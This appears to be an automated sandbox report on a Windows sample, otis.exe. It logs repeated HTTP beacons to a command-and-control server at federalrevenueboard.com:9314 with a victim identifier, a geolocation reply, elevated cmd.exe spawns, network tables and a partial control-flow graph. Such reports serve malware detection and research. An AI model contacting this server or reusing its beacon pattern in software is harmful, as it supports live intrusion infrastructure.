    Nov 13, 2024 08:05:50.177330971 CET696949755192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:50.222919941 CET497556969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:50.227796078 CET696949755192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:50.227876902 CET497556969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:50.232695103 CET696949755192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:51.108321905 CET696949755192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:51.108402014 CET497556969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:51.109472990 CET497556969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:51.114336967 CET696949755192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:51.140381098 CET497569314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:51.145184994 CET93144975691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:51.145275116 CET497569314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:51.145406008 CET497569314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:51.150119066 CET93144975691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:52.040460110 CET93144975691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:52.051599979 CET93144975691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:52.051667929 CET497569314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:52.051727057 CET497569314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:52.056955099 CET93144975691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:52.057007074 CET497569314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:52.139503956 CET497576969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:52.144320965 CET696949757192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:52.144433975 CET497576969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:52.153333902 CET497576969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:52.158138990 CET696949757192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:52.189068079 CET497576969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:52.193962097 CET696949757192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:52.194039106 CET497576969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:52.198878050 CET696949757192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:53.116219044 CET696949757192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:53.116281986 CET497576969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:53.117151976 CET497576969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:53.121918917 CET696949757192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:53.127233028 CET497599314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:53.132031918 CET93144975991.132.92.231192.168.2.4
    Nov 13, 2024 08:05:53.132097960 CET497599314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:53.132330894 CET497599314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:53.137372971 CET93144975991.132.92.231192.168.2.4
    Nov 13, 2024 08:05:54.019128084 CET93144975991.132.92.231192.168.2.4
    Nov 13, 2024 08:05:54.029196978 CET93144975991.132.92.231192.168.2.4
    Nov 13, 2024 08:05:54.029257059 CET497599314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:54.029340029 CET497599314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:54.034960032 CET93144975991.132.92.231192.168.2.4
    Nov 13, 2024 08:05:54.035013914 CET497599314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:58.358305931 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:58.363320112 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:58.363504887 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:58.378757000 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:58.383600950 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:58.418200970 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:58.423706055 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:58.423769951 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:58.428550959 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:06:56.503081083 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:06:56.508030891 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:07:04.925167084 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:07:04.930140018 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:07:17.937432051 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:07:17.942333937 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:07:35.390706062 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:07:35.395680904 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:07:36.328193903 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:07:36.333060980 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:07:41.031089067 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:07:41.035945892 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:07:45.984342098 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:07:45.989891052 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:07:50.377619028 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:07:50.382472992 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:07:55.953619003 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:07:55.958693981 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:08:27.423465967 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:08:27.428447008 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:08:38.406939030 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:08:38.412205935 CET696949766192.121.170.106192.168.2.4
    Nov 13, 2024 08:09:03.897557974 CET497666969192.168.2.4192.121.170.106
    Nov 13, 2024 08:09:03.902609110 CET696949766192.121.170.106192.168.2.4
    TimestampSource PortDest PortSource IPDest IP
    Nov 13, 2024 08:05:27.021054029 CET5105353192.168.2.41.1.1.1
    Nov 13, 2024 08:05:27.148169994 CET53510531.1.1.1192.168.2.4
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Nov 13, 2024 08:05:27.021054029 CET192.168.2.41.1.1.10x6b5bStandard query (0)federalrevenueboard.comA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Nov 13, 2024 08:05:27.148169994 CET1.1.1.1192.168.2.40x6b5bNo error (0)federalrevenueboard.com91.132.92.231A (IP address)IN (0x0001)false
    • federalrevenueboard.com:9314
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.44973691.132.92.23193146580C:\Users\user\Desktop\otis.exe
    TimestampBytes transferredDirectionData
    Nov 13, 2024 08:05:27.167279005 CET127OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
    Host: federalrevenueboard.com:9314
    Connection: Keep-Alive
    Nov 13, 2024 08:05:28.074790001 CET199INHTTP/1.1 200 OK
    Server: Werkzeug/3.0.4 Python/3.10.12
    Date: Wed, 13 Nov 2024 07:05:27 GMT
    Content-Type: application/json
    Content-Length: 359
    Access-Control-Allow-Origin: *
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    1192.168.2.44973891.132.92.23193146580C:\Users\user\Desktop\otis.exe
    TimestampBytes transferredDirectionData
    Nov 13, 2024 08:05:29.321250916 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
    Host: federalrevenueboard.com:9314
    Nov 13, 2024 08:05:30.229161978 CET199INHTTP/1.1 200 OK
    Server: Werkzeug/3.0.4 Python/3.10.12
    Date: Wed, 13 Nov 2024 07:05:30 GMT
    Content-Type: application/json
    Content-Length: 359
    Access-Control-Allow-Origin: *
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    2192.168.2.44974091.132.92.23193146580C:\Users\user\Desktop\otis.exe
    TimestampBytes transferredDirectionData
    Nov 13, 2024 08:05:31.301664114 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
    Host: federalrevenueboard.com:9314
    Nov 13, 2024 08:05:32.212677002 CET199INHTTP/1.1 200 OK
    Server: Werkzeug/3.0.4 Python/3.10.12
    Date: Wed, 13 Nov 2024 07:05:32 GMT
    Content-Type: application/json
    Content-Length: 359
    Access-Control-Allow-Origin: *
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    3192.168.2.44974291.132.92.23193146580C:\Users\user\Desktop\otis.exe
    TimestampBytes transferredDirectionData
    Nov 13, 2024 08:05:33.333884001 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
    Host: federalrevenueboard.com:9314
    Nov 13, 2024 08:05:34.227034092 CET199INHTTP/1.1 200 OK
    Server: Werkzeug/3.0.4 Python/3.10.12
    Date: Wed, 13 Nov 2024 07:05:34 GMT
    Content-Type: application/json
    Content-Length: 359
    Access-Control-Allow-Origin: *
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    4192.168.2.44974491.132.92.23193146580C:\Users\user\Desktop\otis.exe
    TimestampBytes transferredDirectionData
    Nov 13, 2024 08:05:35.255582094 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
    Host: federalrevenueboard.com:9314
    Nov 13, 2024 08:05:36.154927969 CET199INHTTP/1.1 200 OK
    Server: Werkzeug/3.0.4 Python/3.10.12
    Date: Wed, 13 Nov 2024 07:05:36 GMT
    Content-Type: application/json
    Content-Length: 359
    Access-Control-Allow-Origin: *
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    5192.168.2.44974691.132.92.23193146580C:\Users\user\Desktop\otis.exe
    TimestampBytes transferredDirectionData
    Nov 13, 2024 08:05:37.269653082 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
    Host: federalrevenueboard.com:9314
    Nov 13, 2024 08:05:38.163793087 CET199INHTTP/1.1 200 OK
    Server: Werkzeug/3.0.4 Python/3.10.12
    Date: Wed, 13 Nov 2024 07:05:38 GMT
    Content-Type: application/json
    Content-Length: 359
    Access-Control-Allow-Origin: *
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    6192.168.2.44974891.132.92.23193146580C:\Users\user\Desktop\otis.exe
    TimestampBytes transferredDirectionData
    Nov 13, 2024 08:05:43.239478111 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
    Host: federalrevenueboard.com:9314
    Nov 13, 2024 08:05:44.123017073 CET199INHTTP/1.1 200 OK
    Server: Werkzeug/3.0.4 Python/3.10.12
    Date: Wed, 13 Nov 2024 07:05:44 GMT
    Content-Type: application/json
    Content-Length: 359
    Access-Control-Allow-Origin: *
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    7192.168.2.44975091.132.92.23193146580C:\Users\user\Desktop\otis.exe
    TimestampBytes transferredDirectionData
    Nov 13, 2024 08:05:45.292557955 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
    Host: federalrevenueboard.com:9314
    Nov 13, 2024 08:05:46.194188118 CET199INHTTP/1.1 200 OK
    Server: Werkzeug/3.0.4 Python/3.10.12
    Date: Wed, 13 Nov 2024 07:05:46 GMT
    Content-Type: application/json
    Content-Length: 359
    Access-Control-Allow-Origin: *
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    8192.168.2.44975291.132.92.23193146580C:\Users\user\Desktop\otis.exe
    TimestampBytes transferredDirectionData
    Nov 13, 2024 08:05:47.254683018 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
    Host: federalrevenueboard.com:9314
    Nov 13, 2024 08:05:48.140949011 CET199INHTTP/1.1 200 OK
    Server: Werkzeug/3.0.4 Python/3.10.12
    Date: Wed, 13 Nov 2024 07:05:48 GMT
    Content-Type: application/json
    Content-Length: 359
    Access-Control-Allow-Origin: *
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    9192.168.2.44975491.132.92.23193146580C:\Users\user\Desktop\otis.exe
    TimestampBytes transferredDirectionData
    Nov 13, 2024 08:05:49.176573038 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
    Host: federalrevenueboard.com:9314
    Nov 13, 2024 08:05:50.100148916 CET558INHTTP/1.1 200 OK
    Server: Werkzeug/3.0.4 Python/3.10.12
    Date: Wed, 13 Nov 2024 07:05:49 GMT
    Content-Type: application/json
    Content-Length: 359
    Access-Control-Allow-Origin: *
    Connection: close
    Data Raw: 7b 0a 20 20 22 52 65 71 75 65 73 74 49 64 22 3a 20 22 4d 54 6b 79 4c 6a 45 79 4d 53 34 78 4e 7a 41 75 4d 54 41 32 4f 6a 59 35 4e 6a 6b 3d 22 2c 0a 20 20 22 61 73 22 3a 20 22 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 53 69 65 72 72 61 20 56 69 73 74 61 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 22 69 73 70 22 3a 20 22 43 4f 4e 55 53 2d 59 50 47 22 2c 0a 20 20 22 6c 61 74 22 3a 20 33 31 2e 35 35 35 32 2c 0a 20 20 22 6c 6f 6e 22 3a 20 2d 31 31 30 2e 33 35 2c 0a 20 20 22 6f 72 67 22 3a 20 22 55 53 41 49 53 43 22 2c 0a 20 20 22 71 75 65 72 79 22 3a 20 22 36 2e 33 2e 32 2e 35 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 41 5a 22 2c 0a 20 20 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 20 22 41 72 69 7a 6f 6e 61 22 2c 0a 20 20 22 73 74 61 74 75 73 22 3a 20 22 73 75 63 63 65 73 73 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 22 [TRUNCATED]
    Data Ascii: { "RequestId": "MTkyLjEyMS4xNzAuMTA2OjY5Njk=", "as": "", "city": "Sierra Vista", "country": "United States", "countryCode": "US", "isp": "CONUS-YPG", "lat": 31.5552, "lon": -110.35, "org": "USAISC", "query": "6.3.2.5", "region": "AZ", "regionName": "Arizona", "status": "success", "timezone": "America/Phoenix", "zip": "85613"}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    10192.168.2.44975691.132.92.23193146580C:\Users\user\Desktop\otis.exe
    TimestampBytes transferredDirectionData
    Nov 13, 2024 08:05:51.145406008 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
    Host: federalrevenueboard.com:9314
    Nov 13, 2024 08:05:52.040460110 CET199INHTTP/1.1 200 OK
    Server: Werkzeug/3.0.4 Python/3.10.12
    Date: Wed, 13 Nov 2024 07:05:51 GMT
    Content-Type: application/json
    Content-Length: 359
    Access-Control-Allow-Origin: *
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    11192.168.2.44975991.132.92.23193146580C:\Users\user\Desktop\otis.exe
    TimestampBytes transferredDirectionData
    Nov 13, 2024 08:05:53.132330894 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
    Host: federalrevenueboard.com:9314
    Nov 13, 2024 08:05:54.019128084 CET199INHTTP/1.1 200 OK
    Server: Werkzeug/3.0.4 Python/3.10.12
    Date: Wed, 13 Nov 2024 07:05:53 GMT
    Content-Type: application/json
    Content-Length: 359
    Access-Control-Allow-Origin: *
    Connection: close


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:02:04:55
    Start date:13/11/2024
    Path:C:\Users\user\Desktop\otis.exe
    Wow64 process (32bit):false
    Commandline:"C:\Users\user\Desktop\otis.exe"
    Imagebase:0x2107df70000
    File size:22'016 bytes
    MD5 hash:3D922C89C5F0F8F9A738BEC3A24D0494
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    Target ID:4
    Start time:02:05:27
    Start date:13/11/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"cmd.exe" /k echo smyytbFVD4:284992/user
    Imagebase:0x7ff619180000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:5
    Start time:02:05:27
    Start date:13/11/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:6
    Start time:02:05:29
    Start date:13/11/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"cmd.exe" /k echo smyytbFVD4:284992/user
    Imagebase:0x7ff619180000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:7
    Start time:02:05:29
    Start date:13/11/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:8
    Start time:02:05:31
    Start date:13/11/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"cmd.exe" /k echo smyytbFVD4:284992/user
    Imagebase:0x7ff619180000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:9
    Start time:02:05:31
    Start date:13/11/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:10
    Start time:02:05:33
    Start date:13/11/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"cmd.exe" /k echo smyytbFVD4:284992/user
    Imagebase:0x7ff619180000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:11
    Start time:02:05:33
    Start date:13/11/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:12
    Start time:02:05:35
    Start date:13/11/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"cmd.exe" /k echo smyytbFVD4:284992/user
    Imagebase:0x7ff619180000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:13
    Start time:02:05:35
    Start date:13/11/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:14
    Start time:02:05:37
    Start date:13/11/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"cmd.exe" /k echo smyytbFVD4:284992/user
    Imagebase:0x7ff619180000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:15
    Start time:02:05:37
    Start date:13/11/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:16
    Start time:02:05:43
    Start date:13/11/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"cmd.exe" /k echo smyytbFVD4:284992/user
    Imagebase:0x7ff619180000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:17
    Start time:02:05:43
    Start date:13/11/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:18
    Start time:02:05:45
    Start date:13/11/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"cmd.exe" /k echo smyytbFVD4:284992/user
    Imagebase:0x7ff619180000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:19
    Start time:02:05:45
    Start date:13/11/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:20
    Start time:02:05:47
    Start date:13/11/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"cmd.exe" /k echo smyytbFVD4:284992/user
    Imagebase:0x7ff619180000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:21
    Start time:02:05:47
    Start date:13/11/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:22
    Start time:02:05:49
    Start date:13/11/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"cmd.exe" /k echo smyytbFVD4:284992/user
    Imagebase:0x7ff619180000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:23
    Start time:02:05:49
    Start date:13/11/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:24
    Start time:02:05:51
    Start date:13/11/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"cmd.exe" /k echo smyytbFVD4:284992/user
    Imagebase:0x7ff619180000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:25
    Start time:02:05:51
    Start date:13/11/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:26
    Start time:02:05:57
    Start date:13/11/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"cmd.exe" /k echo smyytbFVD4:284992/user
    Imagebase:0x7ff619180000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:false

    Target ID:27
    Start time:02:05:57
    Start date:13/11/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:false

    Reset < >

      Execution Graph

      Execution Coverage:13.2%
      Dynamic/Decrypted Code Coverage:100%
      Signature Coverage:0%
      Total number of Nodes:3
      Total number of Limit Nodes:0
      execution_graph 11652 7ffd9b8aa1d4 11654 7ffd9b8aa1dd LoadLibraryExW 11652->11654 11655 7ffd9b8aa28d 11654->11655

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 481 7ffd9b8b3bfd-7ffd9b8b3c01 482 7ffd9b8b3c09 481->482 483 7ffd9b8b3c03 481->483 484 7ffd9b8b3c0b 482->484 485 7ffd9b8b3c0c-7ffd9b8b3c1d 482->485 483->482 484->485 486 7ffd9b8b3c1f 485->486 487 7ffd9b8b3c20-7ffd9b8b3c31 485->487 486->487 488 7ffd9b8b3c33 487->488 489 7ffd9b8b3c34-7ffd9b8b3c45 487->489 488->489 490 7ffd9b8b3c47 489->490 491 7ffd9b8b3c48-7ffd9b8b3c59 489->491 490->491 492 7ffd9b8b3c5b 491->492 493 7ffd9b8b3c5c-7ffd9b8b3c6d 491->493 492->493 494 7ffd9b8b3c6f 493->494 495 7ffd9b8b3c70-7ffd9b8b3c81 493->495 494->495 496 7ffd9b8b3c83 495->496 497 7ffd9b8b3c84-7ffd9b8b3cd0 495->497 496->497 498 7ffd9b8b3ce1-7ffd9b8b3d0d 497->498 499 7ffd9b8b3cd2-7ffd9b8b3cdd 497->499 504 7ffd9b8b3f0a-7ffd9b8b3f3d 498->504 505 7ffd9b8b3d13-7ffd9b8b3d1c 498->505 499->498 509 7ffd9b8b3f44-7ffd9b8b3fa4 504->509 506 7ffd9b8b3d2d-7ffd9b8b3d86 505->506 507 7ffd9b8b3d1e-7ffd9b8b3d27 505->507 522 7ffd9b8b3d88-7ffd9b8b3dce 506->522 523 7ffd9b8b3dd5-7ffd9b8b3deb 506->523 507->506 507->509 524 7ffd9b8b3fa6-7ffd9b8b3fba 509->524 525 7ffd9b8b3fc4-7ffd9b8b3fda 509->525 522->523 530 7ffd9b8b3dfb-7ffd9b8b3e15 523->530 531 7ffd9b8b3ded-7ffd9b8b3dfa 523->531 524->525 532 7ffd9b8b3fdc-7ffd9b8b3fe4 525->532 533 7ffd9b8b3ff2-7ffd9b8b401b 525->533 539 7ffd9b8b3ea8-7ffd9b8b3eb3 530->539 540 7ffd9b8b3e1b-7ffd9b8b3e7c 530->540 531->530 535 7ffd9b8b3fea-7ffd9b8b3feb 532->535 547 7ffd9b8b401d 533->547 548 7ffd9b8b4024-7ffd9b8b4033 533->548 535->533 545 7ffd9b8b3eb5-7ffd9b8b3ef2 539->545 546 7ffd9b8b3e9b-7ffd9b8b3ea6 539->546 559 7ffd9b8b3ef3-7ffd9b8b3f09 540->559 566 7ffd9b8b3e7e-7ffd9b8b3e9a 